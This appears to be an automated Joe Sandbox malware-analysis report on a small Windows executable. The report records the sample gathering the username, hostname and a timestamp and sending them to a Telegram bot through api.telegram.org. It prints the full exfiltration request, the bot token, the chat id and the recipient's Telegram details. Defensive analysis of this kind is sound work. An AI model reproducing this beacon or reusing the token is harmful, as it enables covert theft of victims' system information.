                                Dec 21, 2024 08:41:03.752451897 CET49707443192.168.2.6149.154.167.220
                                Dec 21, 2024 08:41:03.756215096 CET49707443192.168.2.6149.154.167.220
                                Dec 21, 2024 08:41:03.756226063 CET44349707149.154.167.220192.168.2.6
                                Dec 21, 2024 08:41:05.137094021 CET44349707149.154.167.220192.168.2.6
                                Dec 21, 2024 08:41:05.137203932 CET49707443192.168.2.6149.154.167.220
                                Dec 21, 2024 08:41:05.143471003 CET49707443192.168.2.6149.154.167.220
                                Dec 21, 2024 08:41:05.143486023 CET44349707149.154.167.220192.168.2.6
                                Dec 21, 2024 08:41:05.143878937 CET44349707149.154.167.220192.168.2.6
                                Dec 21, 2024 08:41:05.189982891 CET49707443192.168.2.6149.154.167.220
                                Dec 21, 2024 08:41:05.348881960 CET49707443192.168.2.6149.154.167.220
                                Dec 21, 2024 08:41:05.395328045 CET44349707149.154.167.220192.168.2.6
                                Dec 21, 2024 08:41:05.854322910 CET44349707149.154.167.220192.168.2.6
                                Dec 21, 2024 08:41:05.854542971 CET44349707149.154.167.220192.168.2.6
                                Dec 21, 2024 08:41:05.854604959 CET49707443192.168.2.6149.154.167.220
                                Dec 21, 2024 08:41:05.854918003 CET49707443192.168.2.6149.154.167.220
                                Dec 21, 2024 08:41:05.854940891 CET44349707149.154.167.220192.168.2.6
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 21, 2024 08:41:03.594329119 CET6304853192.168.2.61.1.1.1
                                Dec 21, 2024 08:41:03.732945919 CET53630481.1.1.1192.168.2.6
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 21, 2024 08:41:03.594329119 CET192.168.2.61.1.1.10x994aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 21, 2024 08:41:03.732945919 CET1.1.1.1192.168.2.60x994aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                • api.telegram.org
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.649707149.154.167.2204436436C:\Users\user\Desktop\8v1GZ8v1LF.exe
                                TimestampBytes transferredDirectionData
                                2024-12-21 07:41:05 UTC268OUTGET /bot7711793804:AAE3BiIO_K8p8Zs9Zj4A0DD1R7tOOmD8y9Q/sendMessage?chat_id=257842114&text=Username:%20user%0AHostname:%20855271%0ATimestamp:%202024-12-21%2002:41:02 HTTP/1.1
                                Connection: Keep-Alive
                                User-Agent: A Telegram Bot Client/1.0
                                Host: api.telegram.org
                                2024-12-21 07:41:05 UTC388INHTTP/1.1 200 OK
                                Server: nginx/1.18.0
                                Date: Sat, 21 Dec 2024 07:41:05 GMT
                                Content-Type: application/json
                                Content-Length: 332
                                Connection: close
                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                2024-12-21 07:41:05 UTC332INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 31 31 37 39 33 38 30 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 44 43 41 5f 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 66 68 5f 63 64 63 61 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 35 37 38 34 32 31 31 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 6e 64 72 65 61 73 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 50 2e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 65 72 69 5f 61 6e 64 5f 66 72 65 6b 69 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 37 36 36 38 36 35 2c 22 74
                                Data Ascii: {"ok":true,"result":{"message_id":461,"from":{"id":7711793804,"is_bot":true,"first_name":"CDCA_Bot","username":"fh_cdca_bot"},"chat":{"id":257842114,"first_name":"Andreas","last_name":"P.","username":"geri_and_freki","type":"private"},"date":1734766865,"t


                                Click to jump to process

                                Click to jump to process

                                Click to jump to process

                                Target ID:0
                                Start time:02:41:02
                                Start date:21/12/2024
                                Path:C:\Users\user\Desktop\8v1GZ8v1LF.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\8v1GZ8v1LF.exe"
                                Imagebase:0x6d0000
                                File size:10'752 bytes
                                MD5 hash:0EBECD9783B94A5A634FF71B100E337F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:1
                                Start time:02:41:02
                                Start date:21/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:23%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:24.2%
                                  Total number of Nodes:128
                                  Total number of Limit Nodes:9
                                  execution_graph 425 6d145c _seh_filter_exe 350 6d1335 351 6d1341 ___scrt_is_nonwritable_in_current_image 350->351 372 6d1659 351->372 353 6d1348 354 6d14a1 353->354 357 6d1372 353->357 403 6d1947 IsProcessorFeaturePresent 354->403 356 6d14a8 exit 358 6d14ae _exit 356->358 359 6d1376 _initterm_e 357->359 363 6d13bf ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 357->363 360 6d1391 359->360 361 6d13a2 _initterm 359->361 361->363 362 6d1413 _get_initial_narrow_environment __p___argv __p___argc 376 6d1080 GetUserNameA 362->376 363->362 366 6d140b _register_thread_local_exe_atexit_callback 363->366 365 6d142f 401 6d1a67 GetModuleHandleW 365->401 366->362 369 6d143d 370 6d1446 ___scrt_uninitialize_crt 369->370 371 6d1441 _cexit 369->371 370->360 371->370 373 6d1662 372->373 407 6d1be4 IsProcessorFeaturePresent 373->407 375 6d166e ___scrt_uninitialize_crt 375->353 377 6d124f 376->377 378 6d10b9 GetComputerNameA 376->378 380 6d1262 5 API calls 377->380 378->377 379 6d10df _time64 _localtime64_s 378->379 379->377 381 6d110b strftime 379->381 382 6d125e 380->382 409 6d1040 381->409 382->365 384 6d114c WinHttpOpen 385 6d116c WinHttpConnect 384->385 386 6d123e 384->386 388 6d119f 385->388 389 6d1186 WinHttpCloseHandle 385->389 387 6d1262 5 API calls 386->387 390 6d124b 387->390 412 6d1010 388->412 415 6d1262 389->415 390->365 393 6d11c7 WinHttpOpenRequest 395 6d120d WinHttpSendRequest 393->395 396 6d11ee WinHttpCloseHandle WinHttpCloseHandle 393->396 394 6d119b 394->365 398 6d122d WinHttpCloseHandle WinHttpCloseHandle WinHttpCloseHandle 395->398 399 6d1224 WinHttpReceiveResponse 395->399 397 6d1262 5 API calls 396->397 400 6d1209 397->400 398->386 399->398 400->365 402 6d1439 401->402 402->356 402->369 404 6d195d 403->404 405 6d1969 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 404->405 406 6d1a53 405->406 406->356 408 6d1c08 407->408 408->375 422 6d1000 409->422 411 6d1058 __stdio_common_vsprintf 411->384 423 6d1000 412->423 414 6d1028 __stdio_common_vswprintf 414->393 416 6d126b IsProcessorFeaturePresent 415->416 417 6d126a 415->417 419 6d14fe 416->419 417->394 424 6d14c1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 419->424 421 6d15e1 421->394 422->411 423->414 424->421 426 6d1ab5 427 6d1aec 426->427 429 6d1ac7 426->429 428 6d1af4 __current_exception __current_exception_context terminate 429->427 429->428 430 6d1bb5 433 6d1e6c 430->433 434 6d1bc3 _except_handler4_common 433->434 435 6d14b7 438 6d1881 435->438 437 6d14bc 437->437 439 6d1897 438->439 441 6d18a0 439->441 442 6d1834 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 439->442 441->437 442->441 443 6d1270 _set_app_type 467 6d18d3 443->467 445 6d127d _set_fmode 468 6d18cc 445->468 447 6d1288 __p__commode 469 6d1692 447->469 449 6d1947 6 API calls 450 6d131a 449->450 451 6d1298 __RTC_Initialize 465 6d1304 451->465 479 6d181f 451->479 453 6d12b1 454 6d12b6 _configure_narrow_argv 453->454 455 6d12c2 454->455 454->465 482 6d18d9 InitializeSListHead 455->482 457 6d12c7 458 6d12d0 __setusermatherr 457->458 459 6d12db 457->459 458->459 483 6d18e8 _controlfp_s 459->483 461 6d12ea 462 6d12ef _configthreadlocale 461->462 463 6d12fb ___scrt_uninitialize_crt 462->463 464 6d12ff _initialize_narrow_environment 463->464 463->465 464->465 465->449 466 6d1312 465->466 467->445 468->447 470 6d169e 469->470 471 6d16a2 469->471 470->451 472 6d1711 471->472 474 6d16af ___scrt_release_startup_lock 471->474 473 6d1947 6 API calls 472->473 475 6d1718 473->475 476 6d16bc _initialize_onexit_table 474->476 478 6d16da 474->478 477 6d16cb _initialize_onexit_table 476->477 476->478 477->478 478->451 488 6d17f2 479->488 482->457 484 6d1901 483->484 485 6d1900 483->485 486 6d1947 6 API calls 484->486 485->461 487 6d1908 486->487 487->461 489 6d1808 _register_onexit_function 488->489 490 6d1801 _crt_atexit 488->490 491 6d1813 489->491 490->491 491->453 492 6d1470 493 6d1a67 GetModuleHandleW 492->493 494 6d1478 493->494 495 6d147c 494->495 496 6d14ae _exit 494->496 497 6d1487 495->497 498 6d1482 _c_exit 495->498 498->497 499 6d1323 503 6d1aa9 SetUnhandledExceptionFilter 499->503 501 6d1328 502 6d132d _set_new_mode 501->502 503->501

                                  Callgraph

                                  Control-flow Graph

                                  APIs
                                  • GetUserNameA.ADVAPI32(?,?), ref: 006D10AB
                                  • GetComputerNameA.KERNEL32(?,?), ref: 006D10D1
                                  • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?), ref: 006D10E6
                                  • _localtime64_s.API-MS-WIN-CRT-TIME-L1-1-0(?,?), ref: 006D10FA
                                  • strftime.API-MS-WIN-CRT-TIME-L1-1-0(?,00000050,%Y-%m-%d %H:%M:%S,?), ref: 006D111E
                                    • Part of subcall function 006D1040: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00000000,?), ref: 006D1061
                                  • WinHttpOpen.WINHTTP(A Telegram Bot Client/1.0,00000000,00000000,00000000,00000000), ref: 006D115C
                                  • WinHttpConnect.WINHTTP(00000000,api.telegram.org,000001BB,00000000), ref: 006D117A
                                  • WinHttpCloseHandle.WINHTTP(00000000), ref: 006D1187
                                  • WinHttpOpenRequest.WINHTTP(00000000,GET,?,00000000,00000000,00000000,00800000), ref: 006D11E2
                                  • WinHttpCloseHandle.WINHTTP(00000000), ref: 006D11F5
                                  • WinHttpCloseHandle.WINHTTP(00000000), ref: 006D11F8
                                  Strings
                                  • %Y-%m-%d %H:%M:%S, xrefs: 006D1113
                                  • 7711793804:AAE3BiIO_K8p8Zs9Zj4A0DD1R7tOOmD8y9Q, xrefs: 006D11AC
                                  • /bot%S/sendMessage?chat_id=%S&text=%S, xrefs: 006D11B1
                                  • Username: %sHostname: %sTimestamp: %s, xrefs: 006D1136
                                  • api.telegram.org, xrefs: 006D1174
                                  • A Telegram Bot Client/1.0, xrefs: 006D1157
                                  • 257842114, xrefs: 006D11A7
                                  • GET, xrefs: 006D11DC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2156595123.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                  • Associated: 00000000.00000002.2156575810.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156612726.00000000006D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156633575.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d0000_8v1GZ8v1LF.jbxd
                                  Similarity
                                  • API ID: Http$CloseHandle$NameOpen$ComputerConnectRequestUser__stdio_common_vsprintf_localtime64_s_time64strftime
                                  • String ID: %Y-%m-%d %H:%M:%S$/bot%S/sendMessage?chat_id=%S&text=%S$257842114$7711793804:AAE3BiIO_K8p8Zs9Zj4A0DD1R7tOOmD8y9Q$A Telegram Bot Client/1.0$GET$Username: %sHostname: %sTimestamp: %s$api.telegram.org
                                  • API String ID: 3475713852-635623300
                                  • Opcode ID: 38a3c20db4ea816745e36a4ad380db16ee87e4c4a2c5d89f7a00c5f2542b3f45
                                  • Instruction ID: 1000e7d4a62797fef12d487b3b2be5e6b1d40f4f131f02e373be58ef8326ca31
                                  • Opcode Fuzzy Hash: 38a3c20db4ea816745e36a4ad380db16ee87e4c4a2c5d89f7a00c5f2542b3f45
                                  • Instruction Fuzzy Hash: 2A41C732F4031DBBDB20DBA09C55FEEB37EEB15701F004097BA05E6280DAB5AA848B55

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 25 6d1470 26 6d1473 call 6d1a67 25->26 27 6d1478-6d147a 26->27 28 6d147c-6d1480 27->28 29 6d14ae-6d14b6 _exit 27->29 30 6d1487-6d148e 28->30 31 6d1482 _c_exit 28->31 32 6d1491-6d14a0 30->32 31->30
                                  APIs
                                    • Part of subcall function 006D1A67: GetModuleHandleW.KERNEL32(00000000,006D1439), ref: 006D1A69
                                  • _c_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006D1482
                                  • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000007,006D2720,00000014), ref: 006D14B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2156595123.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                  • Associated: 00000000.00000002.2156575810.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156612726.00000000006D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156633575.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d0000_8v1GZ8v1LF.jbxd
                                  Similarity
                                  • API ID: HandleModule_c_exit_exit
                                  • String ID:
                                  • API String ID: 750871209-0
                                  • Opcode ID: 4d59221f076cd7dfbe5441154dced0db434747780ddba69fc4a021ed9b43488c
                                  • Instruction ID: dc3d6ad2215f4b58b64e8084b4c792a19c599935b3a0ccefb72df5bdfdc7d454
                                  • Opcode Fuzzy Hash: 4d59221f076cd7dfbe5441154dced0db434747780ddba69fc4a021ed9b43488c
                                  • Instruction Fuzzy Hash: C5E08C32E04249AFCF20ABD8D8023DDB7B3EF42325F10016BD9213B7A1D7B518119A94

                                  Control-flow Graph

                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006D1953
                                  • memset.VCRUNTIME140(?,00000000,00000003), ref: 006D1979
                                  • memset.VCRUNTIME140(?,00000000,00000050), ref: 006D1A03
                                  • IsDebuggerPresent.KERNEL32 ref: 006D1A1F
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006D1A3F
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 006D1A49
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2156595123.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                  • Associated: 00000000.00000002.2156575810.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156612726.00000000006D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156633575.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d0000_8v1GZ8v1LF.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                  • String ID:
                                  • API String ID: 1045392073-0
                                  • Opcode ID: 9b83504f30a72209b49e1af559a08a7e9647828f0b66c6ecdc4ccb3ffc6345c7
                                  • Instruction ID: 0e6edfe9b4ab1a9ecbfaf38105659bd6e60218546cff5eec27fd7545c7486995
                                  • Opcode Fuzzy Hash: 9b83504f30a72209b49e1af559a08a7e9647828f0b66c6ecdc4ccb3ffc6345c7
                                  • Instruction Fuzzy Hash: 7F311A75D0621D9BDB21DFA5D989BCCBBB9BF19300F10409AE40DAB250EBB05A85CF44

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 168 6d1be4-6d1c02 IsProcessorFeaturePresent 169 6d1c08-6d1c6f 168->169 170 6d1db4-6d1db7 168->170 171 6d1cb4 169->171 172 6d1c71-6d1c7e 169->172 175 6d1cba-6d1cc6 171->175 173 6d1c80-6d1c85 172->173 174 6d1ca3-6d1cb2 172->174 173->174 178 6d1c87-6d1c8c 173->178 174->175 176 6d1cf8 175->176 177 6d1cc8-6d1ceb 175->177 180 6d1cfb-6d1d18 176->180 179 6d1ced-6d1cf6 177->179 177->180 178->174 181 6d1c8e-6d1c93 178->181 179->180 182 6d1d1e-6d1d36 180->182 183 6d1db1-6d1db3 180->183 181->174 184 6d1c95-6d1c9a 181->184 182->183 185 6d1d38-6d1d3e 182->185 183->170 184->174 186 6d1c9c-6d1ca1 184->186 185->183 187 6d1d40-6d1d58 185->187 186->171 186->174 187->183 188 6d1d5a-6d1d74 187->188 188->183 189 6d1d76-6d1d91 188->189 189->183 190 6d1d93-6d1da2 189->190 190->183 191 6d1da4-6d1dab 190->191 191->183
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006D1BFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2156595123.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                  • Associated: 00000000.00000002.2156575810.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156612726.00000000006D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156633575.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d0000_8v1GZ8v1LF.jbxd
                                  Similarity
                                  • API ID: FeaturePresentProcessor
                                  • String ID:
                                  • API String ID: 2325560087-0
                                  • Opcode ID: 2b7fa8c72996a38b009480fcccf19d469ec41be418f0129fc23e3989bcf33ad4
                                  • Instruction ID: 5b0f4f6d60a5d6bd24031ba9e1c610e0deb3821fd4991eefd07fabc5f00fd42e
                                  • Opcode Fuzzy Hash: 2b7fa8c72996a38b009480fcccf19d469ec41be418f0129fc23e3989bcf33ad4
                                  • Instruction Fuzzy Hash: B7517AB1E126159FDB25CF58D9817AABBF2FB48304F14952BD411EB350D7B49A00CF91
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB5,006D1328), ref: 006D1AAE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2156595123.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                  • Associated: 00000000.00000002.2156575810.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156612726.00000000006D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156633575.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d0000_8v1GZ8v1LF.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: a1199ef0ff2bc53fbb822e2a34b226455a030050471770b5acf0f4d0a9b1fe09
                                  • Instruction ID: 08064edd7d9e88f303531347db6389fd78f7de5d81a848382743cd670ebea4ad
                                  • Opcode Fuzzy Hash: a1199ef0ff2bc53fbb822e2a34b226455a030050471770b5acf0f4d0a9b1fe09
                                  • Instruction Fuzzy Hash:

                                  Control-flow Graph

                                  APIs
                                  • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 006D1273
                                  • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 006D127E
                                  • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 006D128A
                                  • __RTC_Initialize.LIBCMT ref: 006D12A2
                                  • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,006D1B3F), ref: 006D12B7
                                    • Part of subcall function 006D18D9: InitializeSListHead.KERNEL32(006D3358,006D12C7), ref: 006D18DE
                                  • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_000018CC), ref: 006D12D5
                                  • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 006D12F0
                                  • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006D12FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2156595123.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                  • Associated: 00000000.00000002.2156575810.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156612726.00000000006D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156633575.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d0000_8v1GZ8v1LF.jbxd
                                  Similarity
                                  • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                  • String ID:
                                  • API String ID: 1933938900-0
                                  • Opcode ID: 85dc0c60720947fbe2e0ccc26c14341d66dc8ec7aec7c91050f5f6d4ae23edea
                                  • Instruction ID: ff7324e4026d64b84f04d309b47fcfbeecc934c61e151616bd642a2f3d23da36
                                  • Opcode Fuzzy Hash: 85dc0c60720947fbe2e0ccc26c14341d66dc8ec7aec7c91050f5f6d4ae23edea
                                  • Instruction Fuzzy Hash: 2801AF05E4070235D9E4B3F26823B8E138B0F83321F15081FB8549E783EEE5C681207E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 131 6d1ab5-6d1ac5 132 6d1aec-6d1af1 131->132 133 6d1ac7-6d1acb 131->133 133->132 134 6d1acd-6d1ad5 133->134 135 6d1af4-6d1b0a __current_exception __current_exception_context terminate 134->135 136 6d1ad7-6d1adc 134->136 136->135 137 6d1ade-6d1ae3 136->137 137->135 138 6d1ae5-6d1aea 137->138 138->132 138->135
                                  APIs
                                  • __current_exception.VCRUNTIME140 ref: 006D1AF4
                                  • __current_exception_context.VCRUNTIME140 ref: 006D1AFE
                                  • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006D1B05
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2156595123.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                  • Associated: 00000000.00000002.2156575810.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156612726.00000000006D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2156633575.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d0000_8v1GZ8v1LF.jbxd
                                  Similarity
                                  • API ID: __current_exception__current_exception_contextterminate
                                  • String ID: csm
                                  • API String ID: 2542180945-1018135373
                                  • Opcode ID: df23aedad293ab92727778c89acd2d573e0f017943e21cf0501d5a4d49cabe10
                                  • Instruction ID: 74ee54e06c89c969b57cd3fced06ea32d499ee4fecbb614d106c58b020e2eefa
                                  • Opcode Fuzzy Hash: df23aedad293ab92727778c89acd2d573e0f017943e21cf0501d5a4d49cabe10
                                  • Instruction Fuzzy Hash: 72F08C35801205AB8B309EAD90040DAB7AFAE1332139D081BE458CF712CBF0AE91C7D6